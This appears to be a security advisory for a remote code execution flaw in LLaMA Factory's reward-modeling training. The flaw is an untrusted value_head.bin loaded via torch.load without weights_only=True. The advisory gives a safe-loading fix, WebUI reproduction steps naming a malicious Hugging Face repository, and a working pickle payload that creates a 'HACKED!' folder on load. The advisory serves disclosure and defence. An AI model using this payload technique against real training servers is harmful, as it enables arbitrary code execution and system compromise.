Summary
A critical remote code execution (RCE) vulnerability was discovered in the LLaMA Factory training process. The vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing an attacker to execute arbitrary code on the host system simply by passing a malicious `Checkpoint path` parameter through the WebUI interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the safe parameter `weights_only=True`.
Note: In torch versions < 2.6, the default is `weights_only=False`, and LLaMA Factory's `setup.py` only requires `torch>=2.0.0`.
Affected Version
LLaMA Factory versions <= 0.9.3 (latest) are affected by this vulnerability.
Details
- In LLaMA Factory's WebUI, when a user sets the `Checkpoint path`, it modifies the `adapter_name_or_path` parameter passed to the training process (code in `src/llamafactory/webui/runner.py`).
- The `adapter_name_or_path` passed to the training process is then used in `src/llamafactory/model/model_utils/valuehead.py` to fetch the corresponding `value_head.bin` file from Hugging Face. This file is subsequently loaded via `torch.load()` without the security parameter `weights_only=True` being set, resulting in remote code execution (code in `src/llamafactory/model/model_utils/valuehead.py`).
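A minimal sketch of the safer call, assuming torch >= 1.13 (where the `weights_only` flag exists); the file and key names here are illustrative, not LLaMA Factory's actual code:

```python
import os
import tempfile

import torch

# Illustrative mitigation sketch: load an untrusted value-head checkpoint
# strictly as tensor data. With weights_only=True, torch.load() refuses
# arbitrary pickled Python objects, so a tampered value_head.bin cannot
# execute code during deserialization.

with tempfile.TemporaryDirectory() as tmp:
    vhead_file = os.path.join(tmp, "value_head.bin")
    # Stand-in for a legitimate value head (hypothetical key name).
    torch.save({"v_head.summary.weight": torch.zeros(1, 4)}, vhead_file)

    # Safe: only tensors and plain containers are deserialized.
    state_dict = torch.load(vhead_file, map_location="cpu", weights_only=True)
    print(sorted(state_dict))  # ['v_head.summary.weight']
```

With `weights_only=False` (the default in torch < 2.6), the same call would fall back to full pickle deserialization, which is where the RCE occurs.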
PoC
Steps to Reproduce
- Deploy LLaMA Factory.
- Perform the remote attack through the WebUI interface:
- Configure `Model name` and `Model path` correctly. For demonstration purposes, we use the small model `llamafactory/tiny-random-Llama-3` to accelerate model loading.
- Set `Finetuning method` to `LoRA` and `Train Stage` to `Reward Modeling`. The vulnerability is specifically triggered during the Reward Modeling training stage.
- Input a malicious Hugging Face path in `Checkpoint path`; here we use `paulinsider/llamafactory-hack`. This repository (https://huggingface.co/paulinsider/llamafactory-hack/tree/main) contains a malicious `value_head.bin` file. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create a `HACKED!` folder).
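The original generation script is not reproduced here; the following is a hedged stand-in that illustrates the underlying mechanism. `torch.load()` without `weights_only=True` deserializes the file with Python's `pickle`, and `pickle` invokes whatever callable a payload's `__reduce__` returns. This benign payload only creates a `HACKED!` folder, mirroring the PoC; a real attacker could substitute any OS command.

```python
import os
import pickle
import tempfile

class MaliciousValueHead:
    """Stand-in payload object (hypothetical name, not the PoC's code)."""

    def __init__(self, target_dir):
        self.target_dir = target_dir

    def __reduce__(self):
        # Runs at unpickle time, i.e. inside the victim's torch.load().
        return (os.makedirs, (self.target_dir,))

with tempfile.TemporaryDirectory() as workdir:
    target = os.path.join(workdir, "HACKED!")
    # Bytes an attacker would upload to the Hub as value_head.bin.
    blob = pickle.dumps(MaliciousValueHead(target))
    # Simulate the victim: deserialization alone executes os.makedirs(target).
    pickle.loads(blob)
    print(os.path.isdir(target))  # True
```

No method on the payload is ever called by the victim; merely loading the file is enough, which is why the attack is invisible during normal training.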
- Click `Start` to begin training. After a brief wait, a `HACKED!` folder will be created on the server. Note that arbitrary malicious code could be executed through this method.
A video demonstration of the vulnerability exploitation is available at the Google Drive link.
Impact
Exploitation of this vulnerability allows remote attackers to:
- Execute arbitrary malicious code / OS commands on the server.
- Potentially compromise sensitive data or escalate privileges.
- Deploy malware or create persistent backdoors in the system.
This significantly increases the risk of data breaches and operational disruption.